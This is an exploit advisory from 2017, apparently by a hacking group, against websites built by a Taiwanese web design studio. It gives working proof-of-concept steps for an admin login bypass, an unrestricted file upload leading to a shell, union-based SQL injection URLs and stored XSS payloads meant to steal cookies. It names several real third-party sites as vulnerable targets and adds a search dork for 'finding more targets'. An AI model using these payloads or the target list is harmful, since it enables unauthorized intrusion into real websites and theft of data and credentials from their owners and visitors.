~Exploit Title : Design by 年特資訊 - Multiple Vulnerability
~Exploit Author : priv8_team
~Home Vendor : http://net99.tw
~Date : Friday - 2017 06 October
~Test : Ubuntu 16.04 LTS (Xenial Xerus) - FireFox
~Tnx : Biskoit Pedar & RxR
-----------------------------------------
[ Description (Vendor) ]
我們是夫妻起經營的工作室(有營業登記)也有開立發票 統一編號:40898804
本工作室-設計師製作網站以及內部程式已經有將近20年,經驗豐富~案件完成度百分之99
,一般件、困難件、可完成一般工程師無法完成的案件~
我們收費合理是很多同業選擇與配合的最佳搭檔~ 我們的專業領域:
網站製作、設計、架構、使用流程規劃,到專業文案撰寫、視覺設計與版型介面設計
[ Vulnerabilities ]
1) Admin Bypass (No Redirect)
2) Remote File Upload
3) SQL injection (Login required)
4) Stored Cross site scripting (Login required)
[PoC]
Admin Bypass :
You can bypass admin page with NoRedirect Plugin of FireFox
http://localhost:8080/admin/login.php << Add NoRedirect
http://localhost:8080/admin/ or admin.php
vuln site : http://www.girls.org.tw/admin/index.php
Remote File Upload :
http://localhost:8080/admin/upload.php
you can upload your files -
if you are Clever , so You can Get Shell =)
vuln site : http://www.girls.org.tw/admin/upload.php
SQL injection :
file : edit_portfolio.php - products_index.php - edit_portfolio.php
parameter : id
Type : Basic Union Based Injection
vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=-16%27+UNION%20SELECT%201,user(),3,4,5-- -
vuln site : http://sh-printing.com.tw/single.php?id=17%27+order+by+4--%20-
vuln site : http://www.u-hope.net/products_index.php?id=-14'+UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11--+
vuln site : https://www.omniko-intl.com/products_index.php?id=-47'+UNION SELECT 1,2,user(),4,5,6-- -
Stored Cross site scripting :
http://localhost:8080/admin/edit_portfolio.php?id=16&action=save
file : edit_portfolio.php
parameter : id
Type : Stored Cross site scripting
Post Data : category="><script>alert('Xss')</script>&title="><script>alert('Xss')</script>&img=img/20170126071854.jpg&sor=2&Submit=æ+交
When you replay header with Live Http - xss stored in categories
when users or admin visited admin page - you will get Cookies or Browser-Hooking =)
vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=16&action=save
[ Dork ]
intext:"Design by 年特資訊"
intext:"Design by 年特資訊" inurl:id=
you can find more targets =)
------------------------------------------
Special tnx: Mr_Yous3fi , Safengine , RxR And All Memebers of Priv8_Team
./priv8_team
#Biskoit_Pedar
